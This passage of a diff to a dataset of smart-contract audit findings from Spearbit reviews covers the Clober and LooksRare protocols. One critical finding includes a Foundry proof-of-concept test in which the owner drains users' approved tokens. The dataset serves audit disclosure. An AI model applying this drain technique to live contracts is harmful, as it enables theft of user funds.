the end of a line and sometimes at the beginning. Although the layout is not disturbing it might be useful to doublecheck it. Here are a few examples of different layouts: function updateWeights(uint256[] memory weights, uint256 weightSum) internal ... { } function depositToken(IERC20 token, uint256 amount) internal { ... } function updatePoolBalance( uint256[] memory amounts, IBVault.PoolBalanceOpKind kind ) internal { ... } function updateWeights(uint256[] memory weights, uint256 weightSum) internal ... { } function updateWeightsGradually( uint256[] calldata targetWeights, uint256 startTime, uint256 endTime ) external override onlyManager whenInitialized whenNotFinalizing { ... } function getWeightChangeRatio(uint256 weight, uint256 targetWeight) internal pure returns (uint256) { } ...", + "title": "childRawIndex in OctopusHeap.pop is not a raw index", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The OctopusHeap uses raw and heap indices. Raw indices are 0-based (root has raw index 0) and iterate the tree top to bottom, left to right. Heap indices are 1-based (root has heap index 1) and iterate the heap left to right, top to bottom, but then iterate the remaining nodes octopus arm by arm. A mapping between the raw index and heap index can be obtained through _convertRawIndexToHeapIndex. The pop function defines a childRawIndex but this variable is not a raw index, it's actually raw index + 1 (1-based).
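For intuition, the child arithmetic differs between the two conventions; a generic complete-binary-tree sketch (illustrative only, not OctopusHeap's layered layout nor its actual _convertRawIndexToHeapIndex):

// 0-based (raw) index i: left child = 2 * i + 1, parent = (i - 1) / 2.
// 1-based index j = i + 1: left child = 2 * j, parent = j / 2.
function leftChildRaw(uint256 i) internal pure returns (uint256) { return 2 * i + 1; }
function leftChildOneBased(uint256 j) internal pure returns (uint256) { return 2 * j; }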
", "labels": [ "Spearbit", - "Gauntlet", + "Clober", "Severity: Informational" ] }, { - "title": "Use Math library functions in a consistent way", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "In the AeraVaultV1 contract, OZ's Math library functions are attached to the type uint256. The min function is used as a member function whereas the max function is used as a library function.", + "title": "Lack of orderIndex validation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The orderIndex parameter in the OrderNFT contract is missing proper validation. Realistically the value should never exceed type(uint232).max as it is passed from the OrderBook contract, however, future changes to the code might potentially cause encoding/decoding ambiguity.", "labels": [ "Spearbit", - "Gauntlet", + "Clober", "Severity: Informational" ] }, { - "title": "Separation of concerns Owner and Manager", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The Owner and Manager roles are separated on purpose. Role separation usually helps to improve quality. However, this separation can be broken if the Owner calls setManager(). This way the Owner can set the Manager to one of his own addresses, perform Manager functions (for example setSwapFee()) and perhaps set it back to the original Manager. Note: as everything happens on chain these actions can be tracked. function setManager(address newManager) external override onlyOwner { if (newManager == address(0)) { revert Aera__ManagerIsZeroAddress(); } if (initialized && noticeTimeoutAt == 0) { calculateAndDistributeManagerFees(); } emit ManagerChanged(manager, newManager); manager = newManager; }", + "title": "Unsafe _getParentHeapIndex, _getLeftChildHeapIndex", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "When heapIndex = 1, _getParentHeapIndex(uint16 heapIndex) would return 0, which is an invalid heap index. When heapIndex = 45, _getLeftChildHeapIndex(uint16 heapIndex) would return 62, which is an invalid heap index.", "labels": [ "Spearbit", - "Gauntlet", + "Clober", "Severity: Informational" ] }, { - "title": "Add modifier whenInitialized to function finalize()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The function finalize() does not have the modifier whenInitialized while most other functions have this modifier. This does not create any real issues because the function contains the check noticeTimeoutAt == 0 which can only be skipped after initiateFinalization(), and this function does have the whenInitialized modifier. function finalize() external override nonReentrant onlyOwner { // no modifier whenInitialized if (noticeTimeoutAt == 0) { // can only be set via initiateFinalization() revert Aera__FinalizationNotInitialized(); } ...
}", + "title": "_priceToIndex function implemented but unused", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The _priceToIndex function for the price books is implemented but unused.", "labels": [ "Spearbit", - "Gauntlet", + "Clober", "Severity: Informational" ] }, { - "title": "Document the use of mustAllowlistLPs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "In the Mannon Vault it is important that no other accounts can use joinPool() on the Balancer pool. If other accounts are able to call joinPool(), they would get Balancer Pool Tokens (BPT) which could rise in value once more funds are added to the pool. Luckily this is prevented by the mustAllowlistLPs parameter in NewPoolParams. Readers could easily overlook this parameter. pool = IBManagedPool( IBManagedPoolFactory(factory).create( IBManagedPoolFactory.NewPoolParams({ vault: IBVault(address(0)), name: name, symbol: symbol, tokens: tokens, normalizedWeights: weights, assetManagers: managers, swapFeePercentage: swapFeePercentage, pauseWindowDuration: 0, bufferPeriodDuration: 0, owner: address(this), swapEnabledOnStart: false, mustAllowlistLPs: true, // prevents other accounts from using joinPool managementSwapFeePercentage: 0 }) ) );", + "title": "Incorrect _MAX_NODES and _MAX_NODES_P descriptions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The derivation of the values _MAX_NODES and _MAX_NODES_P in the comments is incorrect. For _MAX_NODES, C * ((S * C) ** (L - 1)) = 4 * ((2 * 4) ** 3) = 2048 is missing the E; alternatively, replace S * C with N. The issue isn't entirely resolved though, as it becomes C * ((S * C * E) ** (L - 1)) = 4 * ((2 * 4 * 2) ** 3) = 16384, or 2 ** 14. The same applies to _MAX_NODES_P.", "labels": [ "Spearbit", - "Gauntlet", + "Clober", "Severity: Informational" ] }, { - "title": "finalize can be called multiple times", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The finalize function can be called multiple times, leading to the possibility of wasting gas for no reason and emitting a conceptually wrong Finalized event again. Currently, there's no check that prevents the function from being called multiple times, and there is no explicit flag to allow external sources (web app, external contract) to know whether the AeraVault has been finalized or not. Scenario: the AeraVault has already been finalized but the owner (that could be a contract and not a single EOA) is not aware of it. He calls finalize again and wastes gas because of the external calls in a loop done in returnFunds, and emits an additional event Finalized(owner(), [0, 0, ..., 0]) with an array of zeros in the amounts event parameter.", + "title": "marketOrder() with expendOutput reverts with SlippageError with max tolerance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "During the audit the Clober team raised this issue.
Added here to track the fixes.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "Clober", + "Severity: High Risk" ] }, { - "title": "Consider updating finalize to have a more \"clean\" final state for the AeraVault/Balancer pool", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "This is just a suggestion and not an issue per se. The finalize function should ensure that the pool is in a finalized state for both a better UX and DX. Currently, the finalize function is only withdrawing all the funds from the pool after a noticePeriod but is not ensuring that swaps have been disabled and that all the rewards entitled to the Vault (owned by the Treasury) have been claimed.", + "title": "Wrong OrderIndex could be emitted at Claim() event.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "During the audit the Clober team raised this issue. Added here to track the fixes.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "Clober", + "Severity: Low Risk" ] }, { - "title": "enableTradingWithWeights is not emitting an event for pool's weight change", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "enableTradingWithWeights is both changing the pool's weights and enabling the swap feature, but it's only emitting the swap-related event (done by calling setSwapEnabled). Both of those operations should be correctly tracked via events to be monitored by external tools.", + "title": "The Protocol owner can drain users' currency tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "The Protocol owner can drain users' currency tokens that have been approved to the protocol. Makers who want to bid on NFTs would need to approve their currency token to be spent by the protocol. The owner should not be able to access these funds for free. The owner can drain the funds as follows: 1. Calls addTransferManagerForAssetType and assigns the currency token as the transferManagerForAssetType and IERC20.transferFrom.selector as the selectorForAssetType for a new assetType. 2. Signs an almost empty MakerAsk order and sets its collection as the address of the targeted user and the assetType to the newly created assetType. The owner also creates the corresponding TakerBid by setting the recipient field to the amount of currency they would like to transfer. 3. Calls the executeTakerBid endpoint with the above data without a merkleTree or affiliate.
// file: test/foundry/Attack.t.sol pragma solidity 0.8.17; import {IStrategyManager} from \"../../contracts/interfaces/IStrategyManager.sol\"; import {IBaseStrategy} from \"../../contracts/interfaces/IBaseStrategy.sol\"; import {OrderStructs} from \"../../contracts/libraries/OrderStructs.sol\"; import {ProtocolBase} from \"./ProtocolBase.t.sol\"; import {MockERC20} from \"../mock/MockERC20.sol\"; contract NullStrategy is IBaseStrategy { function isLooksRareV2Strategy() external pure override returns (bool) { return true; } function executeNull( OrderStructs.TakerBid calldata /* takerBid */ , OrderStructs.MakerAsk calldata /* makerAsk */ ) external pure returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) {} } contract AttackTest is ProtocolBase { NullStrategy private nullStrategy; MockERC20 private mockERC20; uint256 private signingOwnerPK = 42; address private signingOwner = vm.addr(signingOwnerPK); address private victimUser = address(505); function setUp() public override { super.setUp(); vm.startPrank(_owner); looksRareProtocol.initiateOwnershipTransfer(signingOwner); // This particular strategy is not a requirement of the exploit. nullStrategy = new NullStrategy(); looksRareProtocol.addStrategy( 0, 0, 0, NullStrategy.executeNull.selector, false, address(nullStrategy) ); mockERC20 = new MockERC20(); looksRareProtocol.updateCurrencyWhitelistStatus(address(mockERC20), true); looksRareProtocol.updateCreatorFeeManager(address(0)); mockERC20.mint(victimUser, 1000); vm.stopPrank(); vm.prank(signingOwner); looksRareProtocol.confirmOwnershipTransfer(); } function testDrain() public { vm.prank(victimUser); mockERC20.approve(address(looksRareProtocol), 1000); vm.startPrank(signingOwner); looksRareProtocol.addTransferManagerForAssetType( 2, address(mockERC20), mockERC20.transferFrom.selector ); OrderStructs.MakerAsk memory makerAsk = _createSingleItemMakerAskOrder({ // null strategy askNonce: 0, subsetNonce: 0, strategyId: 1, assetType: 2, // ERC20 asset! orderNonce: 0, collection: victimUser, // <--- will be used as the `from` currency: address(0), signer: signingOwner, minPrice: 0, itemId: 1 }); bytes memory signature = _signMakerAsk(makerAsk, signingOwnerPK); OrderStructs.TakerBid memory takerBid = OrderStructs.TakerBid( address(1000), // `amount` field for the `transferFrom` 0, makerAsk.itemIds, makerAsk.amounts, bytes(\"\") ); looksRareProtocol.executeTakerBid( takerBid, makerAsk, signature, _EMPTY_MERKLE_TREE, _EMPTY_AFFILIATE ); vm.stopPrank(); assertEq(mockERC20.balanceOf(signingOwner), 1000); assertEq(mockERC20.balanceOf(victimUser), 0); } }", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Critical Risk" ] }, { - "title": "Document Balancer checks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Balancer has a large number of internal checks. Weve discussed the use of additional checks in the Aera Vault functions. The advantage of this is that it could result in more user friendly error messages. Additionally it protects against potential future change in the Balancer code. contract AeraVaultV1 is IAeraVaultV1, Ownable, ReentrancyGuard { function enableTradingWithWeights(uint256[] calldata weights) ... { { ... // doesn't check weights.length pool.updateWeightsGradually(timestamp, timestamp, weights); ... } } Balancer code: function updateWeightsGradually( ..., uint256[] memory endWeights) ...
{ (IERC20[] memory tokens, , ) = getVault().getPoolTokens(getPoolId()); ... InputHelpers.ensureInputLengthMatch(tokens.length, endWeights.length); // length check is here ... }", + "title": "StrategyFloorFromChainlink will often revert due to stale prices", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "The FloorFromChainlink strategy inherits from BaseStrategyChainlinkPriceLatency, so it can have a maxLatency of at most 3600 seconds. However, all of the Chainlink mainnet floor price feeds have a heartbeat of 86400 seconds (24 hours), so the Chainlink strategies will revert with the PriceNotRecentEnough error quite often. At the time of writing, every single mainnet floor price feed has an updatedAt timestamp well over 3600 seconds in the past, meaning the strategy would always revert for any mainnet price feed right now. This may have not been realized earlier because the Goerli floor price feeds do have a heartbeat of 3600, but the mainnet heartbeat is much less frequent. One of the consequences is that users might miss out on exchanges they would have accepted. For example, if a taker bid is interested in a maker ask with an ETH premium from the floor, in the likely scenario where the taker didn't log in within 1 hour of the last oracle update, the strategy will revert and the exchange won't happen even though both parties are willing. If the floor moves up again the taker might not be interested anymore. The maker will have lost out on making a premium from the floor, and the taker would have lost out on the exchange they were willing to make.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Medium Risk" ] }, { - "title": "Rename FinalizationInitialized to FinalizationInitiated for code consistency", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The function at L517 was renamed from initializeFinalization to initiateFinalization to avoid confusion with the Aera vault initialization. For code consistency, the corresponding event and error names should be changed.", + "title": "minPrice and maxPrice should reflect the allowed regions for the funds to be transferred from the bidder to the ask recipient", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "1. When a maker or taker sets a minPrice for an ask, the protocol should guarantee that the funds they receive are at least the minPrice amount (currently not enforced). 2. Conversely, when a maker or taker sets a maxPrice for a bid, the protocol should guarantee that the amount they spend is at maximum maxPrice (currently enforced). For 1., the current protocol-controlled deviation can be at most 30% (sum of fees sent to the creator, the protocol fee recipient, and an affiliate).", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Consider enforcing an explicit check on token order to avoid human error", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The Balancer protocol require (and enforce during the pool creation) that the pools token must be ordered by the token address.
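The revert path described in the Chainlink floor-price finding above comes down to a latency check against the feed's last update. A minimal sketch of such a check, assuming a standard Chainlink aggregator interface and reusing the maxLatency / PriceNotRecentEnough names from the finding (the surrounding contract is hypothetical, not the audited source):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

interface IAggregatorV3 {
    function latestRoundData()
        external
        view
        returns (uint80 roundId, int256 answer, uint256 startedAt, uint256 updatedAt, uint80 answeredInRound);
}

contract FloorPriceLatencySketch {
    error PriceNotRecentEnough();

    // The finding notes maxLatency is capped at 3600 seconds, while mainnet
    // floor feeds only update every 86400 seconds, so this check reverts often.
    uint256 public maxLatency = 3600;

    function floorPrice(IAggregatorV3 feed) external view returns (uint256) {
        (, int256 answer,, uint256 updatedAt,) = feed.latestRoundData();
        if (block.timestamp > updatedAt + maxLatency) revert PriceNotRecentEnough();
        return uint256(answer);
    }
}
```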
The following functions accept an uint256[] of amounts or weights without knowing if the order inside that array follow the same order of the tokens inside the Balancer pool. initialDeposit deposit withdraw enableTradingWithWeights updateWeightsGradually While its impossible to totally prevent the human error (they could specify the correct token order but wrongly swap the input order of the amount/weight) we could force the user to be more aware of the specific order in which the amounts/weights must be specified. A possible solution applied to the initialDeposit as an example could be: 37 function initialDeposit(IERC20[] calldata tokensSorted, uint256[] calldata amounts) external override onlyOwner { // ... other code IERC20[] memory tokens = getTokens(); // check that also the tokensSorted length match the lenght of other arrays if (tokens.length != amounts.length || tokens.length != tokensSorted.length) { revert Aera__AmountLengthIsNotSame( tokens.length, amounts.length ); } // ... other code for (uint256 i = 0; i < tokens.length; i++) { // check that the token position associated to the amount has the same position of the one in ,! the balancer pool if( address(tokens[i]) != address(tokensSorted[i]) ) { revert Aera__TokenOrderIsNotSame( address(tokens[i]), address(tokensSorted[i]), i ); } depositToken(tokens[i], amounts[i]); } // ... other code } Another possible implementation would be to introduce a custom struct struct TokenAmount { IERC20 token; uint256 value; } Update the function signature function initialDeposit(TokenAmount[] calldata tokenWithAmount) and up- date the example code following the new parameter model. Its important to note that while this solution will not completely prevent the human error, it will increase the gas consumption of each function.", + "title": "StrategyItemIdsRange does not invalidate makerBid.amounts[0] == 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "StrategyItemIdsRange does not check whether makerBid.amounts[0] is zero or not. If it were 0, the taker can provide empty itemIds and amounts, which will cause the for loop to be skipped. The check below will also be successful since both amounts are 0: if (totalOfferedAmount != desiredAmount) { revert OrderInvalid(); } Depending on the used implementation of a transfer manager for the asset type used in this order, we might end up with the taker taking funds from the maker without providing any NFT tokens. The current implementation of TransferManager does check whether the provided itemIds have length 0 and it would revert in that case. One difference between this strategy and the others is that all strategies, including this one, check and revert if the amount for a specific itemId is 0 (and while some of them have loops, the length of those loops depends on parameters from the maker that force the loop to run at least once); for this strategy, however, if no itemIds are provided by the taker, the loop is skipped and the aggregated amount is never checked against 0.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Swap is not enabled after initialDeposit execution", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "In the current deployment flow of the AeraVault the Balancer pool is created (by the constructor) with swapEnabledOnStart set as false.
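To make the skipped-loop hazard in the StrategyItemIdsRange finding above concrete, here is a simplified sketch consistent with the described behavior (the function shape and names are assumptions reconstructed from the finding, not the audited source):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

contract ItemIdsRangeSketch {
    error OrderInvalid();

    /// Simplified model of the flawed aggregation: if the maker signed
    /// amounts[0] == 0 and the taker supplies empty arrays, the loop body
    /// never runs and the final check passes because 0 == 0.
    function checkOfferedAmount(
        uint256 desiredAmount,           // makerBid.amounts[0], not validated against 0
        uint256[] calldata takerAmounts  // takerAsk.amounts, may be empty
    ) external pure {
        uint256 totalOfferedAmount;
        for (uint256 i; i < takerAmounts.length; i++) {
            totalOfferedAmount += takerAmounts[i];
        }
        if (totalOfferedAmount != desiredAmount) revert OrderInvalid();
    }
}
```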
When the pool receives their initial funds via initialDeposit the pool has still the swap functionality disabled. It is not explicitly clear in the specification document and in the code when the swap functionality should be enabled. If the protocol wants to enable the swap as soon as the funds are deposited in the pool, they should call, after bVault.joinPool(...), setSwapEnabled(true) or enableTradingWithWeights(uint256[] calldata weights) in case the external spot price is not aligned (both functions will also trigger a SetSwapEnabled event)", + "title": "TransferManager's owner can block token transfers for LooksRareProtocol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "In general, a deployed TransferManager (T) and a deployed LooksRareProtocol (L) might have two different owners (O_T, O_L). Assume TransferManager is used for asset types 0 and 1 (ERC721, ERC1155) in LooksRareProtocol and TransferManager has marked the LooksRareProtocol as an allowed operator. At any point, O_T can call removeOperator to block L from calling T. If that happens, O_L would need to add new (virtual) asset types (not 0 or 1) and the corresponding transfer managers for them. Makers would need to resign their orders with new asset types. Moreover, if LooksRare applies their solution for the issue \"The Protocol owner can drain users' currency tokens\" through PR 308, which removes the ability of O_L to add new asset types, then the whole protocol would need to be redeployed, since all order executions would revert.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Remove commented code and replace input values with Balancer enum", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Inside initialDeposit function, there is some commented code (used as example) that should be removed for clarity and future confusion. The initUserData should not use direct input values (0 in this case) but use the correct Balancers enum value to avoid any possible confusion. Following the Balancer documentation Encoding userData JoinKind The correct way to declare initUserData is using the WeightedPoolUserData.JoinKind.INIT enum value.", + "title": "transferItemsERC721 and transferBatchItemsAcrossCollections in TransferManager do not check whether an amount == 1 for an ERC721 token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "transferItemsERC721 and transferBatchItemsAcrossCollections in TransferManager do not check whether an amount == 1 for an ERC721 token.
If an operator (approved by a user) sends a 0 amount for an itemId in the context of transferring an ERC721 token, TransferManager would perform those transfers, even though the logic in the operator might have meant to avoid those transfers.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "The Created event is not including all the information used to deploy the Balancer pool and are missing indexed properties", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The current Created event is defined as 39 event Created( address indexed factory, IERC20[] tokens, uint256[] weights, address manager, address validator, uint32 noticePeriod, string description ); And is missing some of the information that are used to deploy the pool. To allow external tools to better monitor the deployment of the pools, it should be better to include all the information that have been used to deploy the pool on Balancer. The following information is currently missing from the event definition: name symbol managementFee swapFeePercentage The event could also define both manager and validator as indexed event parameters to allow external tools to filter those events by those values.", + "title": "The maker cannot enforce the number of times a specific order can be fulfilled for custom strategies", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "When a maker signs an order with a specific strategy, it leaves it up to the strategy to decide how many times this specific order can be fulfilled. The strategy's logic for deciding on the returned isNonceInvalidated value can in general be complex and prone to errors (or have backdoors). The maker should be able to directly enforce at least an upper bound for the maximum number of fulfills for an order to avoid unexpected expenditure.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Rename temp variable managers to assetManagers to avoid confusions and any potential future mistakes", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The managers declared in the linked code (see context) are in reality Asset Manager that have a totally different role compared to the AeraVault Manager role. The AssetManager is able to control the pools balance, withdrawing from it or depositing into it. To avoid confusion and any potential future mistakes, it should be better to rename the temporary variable managers to a more appropriate name like assetManagers.
- address[] memory managers = new address[](tokens.length); + address[] memory assetManagers = new address[](tokens.length); for (uint256 i = 0; i < tokens.length; i++) { - + } managers[i] = address(this); assetManagers[i] = address(this); pool = IBManagedPool( IBManagedPoolFactory(factory).create( - + IBManagedPoolFactory.NewPoolParams({ vault: IBVault(address(0)), name: name, symbol: symbol, tokens: tokens, normalizedWeights: weights, assetManagers: managers, assetManagers: assetManagers, swapFeePercentage: swapFeePercentage, pauseWindowDuration: 0, bufferPeriodDuration: 0, owner: address(this), swapEnabledOnStart: false, mustAllowlistLPs: true, managementSwapFeePercentage: 0 }) ) ); 41", + "title": "A strategy can potentially reduce the value of a token before it gets transferred to a maker when a taker calls executeTakerAsk", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "When executeTakerAsk is called by a taker, a (maker-signed) strategy will be called: (bool status, bytes memory data) = strategyInfo[makerBid.strategyId].implementation.call( abi.encodeWithSelector(strategyInfo[makerBid.strategyId].selector, takerAsk, makerBid) ); Note that this is a stateful call. This call is performed before the NFT token is transferred to the maker (signer). Even though the strategy is fixed by the maker (since the strategyId has been signed), the strategy's implementation might involve complex logic that could allow (if the strategy colludes with the taker somehow) a derivative token (that is owned by / linked to the to-be-transferred token) to be reattached to another token (think of accessories for an NFT character token in a game). And so the value of the to-be-transferred token would be reduced in that sense. A maker would not be able to check for this linked derivative token ownership during the transaction since there is no post-transfer hook for the maker (except in one special case when the token involved is ERC1155 and the maker is a custom contract). Also, note that all the implemented strategies would not alter the state when they are called (their endpoints have a pure or a view visibility). There is an exception to this in the StrategyTestMultiFillCollectionOrder test contract.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Move description declaration inside the storage slot code block", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "In the current code, the description state variable is in the block of /// STORAGE /// where all the immutable variable are re-grouped.
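Since the executeTakerAsk finding above notes that all audited strategies expose pure or view endpoints, one possible mitigation is to dispatch them with staticcall instead of call, so a strategy cannot mutate state mid-execution. This is an assumed refactoring sketch, not the audited code:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

/// Assumed refactoring sketch: dispatching the strategy with staticcall rules
/// out the stateful-strategy concern, at the cost of forbidding strategies
/// that legitimately need state (e.g. multi-fill accounting).
contract StaticcallDispatchSketch {
    struct StrategyInfo { address implementation; bytes4 selector; }
    mapping(uint256 => StrategyInfo) public strategyInfo;

    function callStrategy(uint256 strategyId, bytes calldata encodedOrders)
        internal
        view
        returns (bool status, bytes memory data)
    {
        StrategyInfo memory info = strategyInfo[strategyId];
        // staticcall makes the inner call revert on any state modification.
        (status, data) = info.implementation.staticcall(
            abi.encodePacked(info.selector, encodedOrders)
        );
    }
}
```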
As the dev comment say, string cannot be immutable bytecode but only set in constructor so it would be better to move it inside the /// STORAGE SLOT START /// block of variables that regroup all the non-constant and non-immutable state variables.", + "title": "An added transfer manager cannot get deactivated from the protocol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Once a transfer manager for an asset type gets added to the protocol either through the constructor or through addTransferManagerForAssetType, if at some point malicious behavior involving the transfer manager is observed, there is no mechanism for the protocol's owner to deactivate the transfer manager (similar to how strategies can be deactivated). If TransferManager is used for an asset type, on the TransferManager side the owner can break the link between the operator (the LooksRare protocol potentially) and the TransferManager but not the other way around.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Remove unused imports from code", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The current implementation of the AeraVaultV1 contract is importing OpenZeppelin IERC165 inter- face, but that interface is never used or references in the code.", + "title": "Temporary DoS is possible in case orders are using tokens with blacklists", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "In the process of settling orders, _transferFungibleTokens is being called at most 4 times. If one of these calls fails, the entire transaction fails. It can only fail when an ERC20 token is used for the trade, but since contracts are whitelisted in the system and probably vetted by the team, it's safe to say it's less probable that the receiver will have the ability to revert the entire transaction, although it is possible for contracts that implement a transferAndCall pattern. However, there's still the issue of transactions being reverted due to blacklisting (which has become more popular in the last year). To better assess the risk, let's elaborate more on the 4 potential recipients of a transaction: 1. affiliate - The risk can be easily mitigated by proper handling at the front-end level. If the transaction fails due to the affiliate's address, the taker can specify address(0) as the affiliate. 2. recipient - If the transaction fails due to the recipient's address, it can only impact the taker in a gas-griefing way. 3. protocol - If the transaction fails due to the protocol's address, its address might be updated by the contract owner in the worst case. 4.
creator - If the transaction fails due to the creator's address it cannot be changed directly, but in the worst case creatorFeeManager can be changed.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "shortfall is repeated twice in IWithdrawalValidator natspec comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The word shortfall is repeated twice in the natspec comment.", + "title": "viewCreatorFeeInfo's reversion depends on order of successful calls to collection.royaltyInfo", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "The outcome of the call to viewCreatorFeeInfo for both CreatorFeeManagerWithRebates and CreatorFeeManagerWithRoyalties is dependent on the order of itemIds. Assume we have 2 itemIds with the following properties: itemId x where the call to collection.royaltyInfo(x, price) is successful (status == 1) and returns (a, ...) where a != 0; itemId y where the call to collection.royaltyInfo(y, price) fails (status == 0). Then if the itemIds provided to viewCreatorFeeInfo is: [x, y], the call to viewCreatorFeeInfo returns successfully as the outcome for y will be ignored/skipped; [y, x], the call to viewCreatorFeeInfo reverts with BundleEIP2981NotAllowed(collection), since the first item will be skipped and so the initial value for creator will not be set and remains address(0), but when we process the loop for x, we end up comparing a with address(0) which causes the revert.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Provide definition of weights & managementFee_ in the NatSpec comment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The NatSpec Format is special form of comments to provide rich documentation for functions, return variables and more. We observed an occurrence where the NatSpec comments are missing for two of the user inputs (weights & managementFee_).", + "title": "CreatorFeeManagerWithRebates.viewCreatorFeeInfo reversion is dependent on the order of itemIds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Assume there is an itemId x where collection.royaltyInfo(x, price) returns (0, _) and another itemId y where collection.royaltyInfo(y, price) returns (a, _) where a != 0. Then if the itemIds array provided to CreatorFeeManagerWithRebates.viewCreatorFeeInfo is [x, y, ...], the return parameters would be (address(0), 0), and if it is [y, x, ...], the call would revert with BundleEIP2981NotAllowed(collection).", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "ERC721SeaDrop's modifier onlyOwnerOrAdministrator would allow either the owner or the admin to override the other person's config parameters.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The following 4 external functions in ERC721SeaDrop have the onlyOwnerOrAdministrator modifier which allows either one to override the other person's work. updateAllowedSeaDrop 